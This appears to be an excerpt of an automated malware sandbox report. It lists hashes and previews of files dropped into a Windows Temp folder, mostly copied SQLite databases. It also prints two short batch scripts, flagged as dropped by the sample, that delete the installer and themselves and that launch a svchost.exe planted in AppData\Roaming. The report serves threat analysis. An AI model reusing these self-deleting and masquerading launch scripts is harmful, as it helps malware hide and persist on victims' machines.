SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2237.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2A6F.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp361D.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4CAC.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4DC0.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4E32.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.0357559628859905
Encrypted:	false
SSDEEP:	3:mKDDCMNuwGv3Dt+kiE2J5xAIJxyBXLNQDwU1hGDt+kiE2J5xAInTRI7XHVZPy:hWKuZLwkn23fJxwXLSDNewkn23fTSHVk
MD5:	96B86203564F241E53A59387DEE088ED
SHA1:	831002B8D875B8F8D8DB8B231AD5783507C4845C
SHA-256:	000E1406A1F6B0ACD996172B01174F69E0F5740CA93B66F0A5DF081594B9D2BD
SHA-512:	CEBCE4D5289A352A4D158BAAFFD7AC057AD59F27DE7DC6EB9DDBB835CB3D5EDCD52B23CF0A742745C2D84B0DD3BD73F1560C4B193E5C6DEB038AEF49787B7830
Malicious:	false
Reputation:	unknown
Preview:	@echo off..timeout 7 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "3CBD.tmp.Installer.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp4F89.tmp.bat" /f /q..

C:\Users\user\AppData\Local\Temp\tmp5850.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5A30.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp767A.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7708.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7712.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7718.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7758.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp77C6.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp77F6.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7807.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7817.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7818.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7A1D.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7C70.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	151
Entropy (8bit):	5.01924739101347
Encrypted:	false
SSDEEP:	3:mKDDCMNqTtvL5ot+kiEaKC5ZACSmqRDt+kiE2J5xAInTRI4q1ZPy:hWKqTtT6wknaZ5Omq1wkn23fTZq1k
MD5:	B4C8F1EBE31C25A84E2DABEC862A2FA8
SHA1:	B3EE64A0542DE25522BDE9797006C49E9D2A682D
SHA-256:	DA256D7F054FC9E1DB2E7F6388C0947121C7F188D76B643BAE5C5AB5BB8AC5CE
SHA-512:	2279A3A9B8D3F594DB31EB431ADB1F91F7A8A1A0EA6B0159175D189E131B23EB75339E94290B172C80EE1C6DF9F80AAA71654A73DF5801D4AF3FD8989B0B05B4
Malicious:	true
Reputation:	unknown
Preview:	@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp7CD3.tmp.bat" /f /q..

C:\Users\user\AppData\Local\Temp\tmp801F.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp82FD.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp835C.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
